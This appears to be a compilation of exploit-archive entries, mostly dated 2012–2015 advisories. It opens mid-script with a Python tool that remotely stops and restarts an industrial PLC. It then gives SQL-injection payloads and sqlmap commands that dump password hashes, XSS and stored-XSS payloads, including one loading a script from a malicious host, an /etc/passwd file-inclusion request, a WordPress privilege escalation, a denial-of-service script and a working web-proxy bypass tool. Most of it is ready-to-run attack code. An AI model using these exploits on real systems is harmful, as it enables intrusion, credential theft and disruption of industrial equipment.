send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000')
ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400')
print 'PLC Type = ' + ret[30:50]
print 'Firmware = ' + ret[66:70]
print 'Build = ' + ret[79:100]
send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000')
send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400')
send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000')
send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400')
send_and_recv(s,1000,'0102000c006bffffff0f00' + code)
s.shutdown(socket.SHUT_RDWR)
s.close()
print 'Initialization done'
print '-------------------\r\n'
print 'Will now print the PLC state and reverse it after 3 seconds'
raw_input('Press [Enter] to continue')
########## CONTROL PHASE ####### Start monitoring with loop on port 41100
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,controlport))
# First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets)
initMonitor(s)
# Query packet
packet1 = '010002000000080003000300000000000200000002400b40'
# Keepalive packet
packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600'
## The loop keepalive and query status loop (2 x keepalive, one time query):
i = 0
state = 'On'
running = 0
stopme = 0
startme = 0
while True:
i += 1
time.sleep(0.1)
## Keep Alive
send_and_recv(s,1000,packet2)
send_and_recv(s,1000,packet2)
## Possible actions (like stop/start) should be sent now before the query state
if (state == 'Running' and stopme):
print 'Sending Stop'
doAction(s,'01000200000000000100070000000000')
startme = stopme = 0
elif (state == 'Stop' and startme):
print 'Sending COLD Start'
## This is the COLD start: doAction(s,'010002000000020001000600000000000100')
## This is the WARM start: doAction(s,'010002000000020001000600000000000200')
## This is the HOT start: doAction(s,'010002000000020001000600000000000300')
doAction(s,'010002000000020001000600000000000100')
startme = stopme = 0
## Query Status
ret = send_and_recv(s,1000,packet1).encode('hex')
if ret[48:50] == '03':
state = 'Running'
elif ret[48:50] == '07':
state = 'Stop'
elif ret[48:50] == '00':
state = 'On'
else:
print 'State unknown, found code: '+ret.encode('hex')[48:50]
print 'Current PLC state: '+state
## Maintaining the LOOP
if i == 50:
break
# '''
if i == 30:
if state == 'Running':
stopme = 1
else:
startme = 1
#'''
raw_input('All done, press [Enter] to exit')
# Exploit Title: SQLi in FeedWordPress WordPress plugin
# Date: 2015-05-19
# Exploit Author: Adrián M. F.
# Vendor Homepage: https://wordpress.org/plugins/feedwordpress/
# Vulnerable version: 2015.0426
# Fixed version: 2015.0514
# CVE : CVE-2015-4018
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
feedwordpresssyndicationpage.class.php:89
+++++++++++++++++++++++++++++++++++++++++
$targets = $wpdb->get_results("
SELECT * FROM $wpdb->links
WHERE link_id IN (".implode(",",$_POST['link_ids']).")
");
+++++++++++++++++++++++++++++++++++++++++
http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php
POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi]
* POC:
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]"
[............]
POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: link_ids[] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)--
---
[10:40:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-14: Vendor notification.
2015-05-14: Vendor response and fix.
2015-05-19: Public disclosure.
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi
# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""
#!/usr/bin/python
filename="zoc.txt"
buffer = "\x41" * 97
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
source: https://www.securityfocus.com/bid/52944/info
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected.
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
source: https://www.securityfocus.com/bid/52970/info
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory
source: https://www.securityfocus.com/bid/52946/info
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
CitrusDB 2.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
source: https://www.securityfocus.com/bid/52983/info
BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
BGS CMS 2.2.1 is vulnerable; other versions may also be affected.
<html>
<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
</script>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="description" value="Cross Site Scripting" />
<input type="hidden" name="parent_id" value="15" />
<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="categories" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="29" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="title" value="Zero Science Lab" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="disp_on_full_view" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="level" value="0" />
<input type="hidden" name="type" value="ads" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="ads" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="0" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="created" value="ZSL" />
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="email" value="test@test.mk" />
<input type="hidden" name="message" value="t00t" />
<input type="hidden" name="status" value="coolio" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="orders" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="question" value="What is physics?" />
<input type="hidden" name="start" value="10 2012" />
<input type="hidden" name="end" value="18 2012" />
<input type="hidden" name="answer_text[]" value="A warm summer evening." />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="polls" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="image" value="joxy.jpg" />
<input type="hidden" name="url" value='"><script>alert(1);</script>' />
<input type="hidden" name="max_displays" value="1" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="banners" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="9" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="description" value="Ban" />
<input type="hidden" name="folder" value="sexy_banner_imgx" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="gallery" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/" method="GET" id="xss6">
<input type="hidden" name="action" value="search" />
<input type="hidden" name="search" value='"><script>alert(1);</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
</form>
<form action="http://www.example.com/cms/" method="GET" id="xss7">
<input type="hidden" name="section" value='"><script>alert(1);</script>' />
<input type="hidden" name="action" value="add_news" />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href="javascript: xss6();" style="text-decoration:none">
<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />
<a href="javascript: xss7();" style="text-decoration:none">
<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />
</body></html>
source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities]
# Date: 2015/05/19
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# Category: webapps
========================================
* 1. Privilege escalation
========================================
1.1 Description
Any registered user can perform a privilege escalation through
`iv_membership_update_user_settings` AJAX action.
Although this exploit can be used to modify other plugin related data
(eg payment status and expiry date), privilege escalation can lead to a
serious incident because the malicious user can take administrative role
to the infected website.
1.2 Proof of Concept
* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php`
with data:
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`
1.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
1.4 Solution
No official solution yet exists.
========================================
* 2. Stored XSS
========================================
2.1 Description
All input fields from registered users aren't properly escaped. This
could lead to an XSS attack that could possibly affect all visitors of
the website, including administators.
2.2 Proof of Concept
* Login as regular user
* Update any field of your profile appending at the end
`<script>alert('XSS');</script>`
or
`<script src=”http://malicious .server/my_malicious_script.js”/>`
2.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
2.4 Solution
No official solution yet exists.
========================================
* 3. Unauthorized post publish and stored XSS
========================================
3.1 Description
Registered users can publish a post without administrator confirmation.
Normally all posts submitted by users registered with WP Membership
plugin are stored with the status `pending`. A malicious user though can
publish his post by crafting the form is used for submission.
3.2 Proof of Concept
* Login as regular user
whom belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
<select id="post_status" class="form-control" name="post_status">
<option value="publish" selected=”selected”>Pending
Review</option>
<option value="draft">Draft</option>
</select>
The post gets immediately published after you submit the form and is
visible to all visitors of the website.
In addition a stored XSS attack can be performed due to insufficient
escaping of the post content input.
3.3 Actions taken after discovery
Vendor was informed on 2015/05/19.
3.4 Solution
No official solution yet exists.
3.5 Workaround
Prevent users from submitting new posts through the relative option in
plugin's settings
source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php?button_value= %22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php?msg=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget ]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before _title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_ title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Forma LMS 1.3 Multiple SQL Injections
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple SQL injections vulnerabilities, which allow unprivileged users to inject arbitrary SQL statements.
An attacker could exploit these vulnerabilities by sending crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other attacks depending on the DBMS’s user privileges.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Unprivileged users such as Student or Professors could exploit these issues.
In reported payload "idst" SQL param is equal to 11836 which was admin's ID in tested installation.
[!] coursereport.php SQL Injection in title param
-------------------------
POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1 Host: localhost
Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885
authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&source_of=scoitem&title=null+union+select+pass+fr om+core_user+where+idst=11836+&filtra=Salva+modifiche
-------------------------
[!] lib.message.php Blind Time-Based SQL Injection in msg_course_filter param
-------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost
Cookie: docebo_session=0c0491bb1fa6d814752d9e59c066df60
[...]
------WebKitFormBoundaryu0DCt6tLZt8hAdlH
Content-Disposition: form-data; name="msg_course_filter"
99999 union SELECT IF(SUBSTRING(pass,1,1) = char(100),benchmark(5000000,encode(1,2)),null) from core_user
where idst=11836
[...]
------------------------
[!] coursereport.php SQL Injection in id_source param
-------------------------
POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1
Host: localhost
Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885; SQLiteManager_currentLangue=2
authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&weight=123&show_to_user=true&use_for_final=true&tit le=&source_of=scoitem&titolo=&id_source=null+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,p ass,null,null,null+from+core_user+where+idst=11836&save=Salva+modifiche
-------------------------
For further details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
=======================================================================
title: SQL Injection
product: WordPress WP Symposium Plugin
vulnerable version: 15.1 (and probably below)
fixed version: 15.4
CVE number: CVE-2015-3325
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/wp-symposium/
found: 2015-02-07
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member
directory, private mail, notification panel, chat windows, profile page, social
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook
Connect and Mobile support! You simply choose which you want to activate!
Certain features are optional to members to protect their privacy."
Source: https://wordpress.org/plugins/wp-symposium/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.
forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
$cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
$topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================
forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
if ($topic_id == 0) {
$forum = __wps__getForum($cat_id);
if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
$html .= $forum;
} else {
$html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
}
}
===============================================================================
functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info
FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID
WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================
Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================
The following HTTP request to the forum page returns a blank page, thus
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================
Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================
Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
See solution.
source: https://www.securityfocus.com/bid/53015/info
McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.
A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.
McAfee Web Gateway 7 is vulnerable; other versions may also be affected.
import socket,struct,sys,time
from threading import Thread
#The timeOut can be changed if the proxy is slow.
#Tested in GMail, Facebook, Youtube and several blocked sites.
#The proxy get the Host field of the http header and do not verify anything else.
#It trusts on the HTTP Header and it can be modified by the attacker.
timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080 #Listening port
proxyAddr = "vulnerableProxy.com" #vulnerable proxy
proxyPort = 8080 # proxy port
def handle(client,globalSock):
client.settimeout(timeOut)
global hostNameG
while 1:
dados = ""
tam = 0
while 1:
try:
dados2 = client.recv(1024)
tam = tam + len(dados2)
dados = dados + dados2
except socket.timeout:
break
dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD
if dd != -1:
dd2 = dados.find(":")
hostName = dados[dd+8:dd2]
ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain
pacote = dados
hostHeader = "Host: " + hostName
pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy
pacote = pacote.replace(hostName, ipAddr) #changind domain for ip
dados = pacote
getd = dados.find("GET ")
getd2 = dados.find("//")
getd3 = dados.find("/", getd2+2)
hostName = dados[getd2+2:getd3]
if getd != -1:
globalSock.close()
globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
globalSock.connect((proxyAddr,proxyPort))
globalSock.settimeout(timeOut)
getd2 = dados.find("//")
getd3 = dados.find("/", getd2+2)
hostName = dados[getd2+2:getd3]
proxyAuth = ""
proxyAuthN = dados.find("Proxy-Authorization:")
if proxyAuthN != -1:
proxyAuthNN = dados.find("\r\n", proxyAuthN)
proxyAuth = dados[proxyAuthN:proxyAuthNN]
ipAddr = socket.gethostbyname(hostName)
info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
if proxyAuthN != -1:
info += proxyAuth + "\r\n"
info += "Host: www.uol.com.br\r\n\r\n"
globalSock.send(info)
tam = 0
gdata = ""
while 1:
try:
gdata2 = globalSock.recv(1024)
tam = tam + len(gdata2)
gdata = gdata + gdata2
if len(gdata2) == 0:
break
except socket.timeout:
break
globalSock.send(dados)
tam = 0
gdata = ""
while 1:
try:
gdata2 = globalSock.recv(1024)
if len(gdata2) > 0:
client.send(gdata2)
tam = tam + len(gdata2)
gdata = gdata + gdata2
if len(gdata2) == 0:
break
except socket.timeout:
break
print 'Proxy Bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid Proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Attacked Proxy:',
print proxyAddr
print 'Listening on',
print port
sockzao.bind(("",port))
sockzao.listen(6)
while 1:
print 'Waiting for connections'
client, address = sockzao.accept()
print 'Client Connected'
print address
globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
globalSock.connect((proxyAddr,proxyPort))
globalSock.settimeout(timeOut)
t = Thread(target=handle, args=(client,globalSock,))
t.start()
source: https://www.securityfocus.com/bid/53018/info
Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bioly 1.3 is vulnerable; other versions may also be affected.
Cross Site Scripting
POST /index.php?action=3 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: STORED XSS TEST
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>®ister=1
SQL Injection
POST /index.php?action=11 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Sql Injection
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
q=%00'
source: https://www.securityfocus.com/bid/53036/info
Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Seditio CMS 165 is vulnerable; prior versions may also be affected.
$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.
HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit
source: https://www.securityfocus.com/bid/53032/info
Munin is prone to a remote command-injection vulnerability.
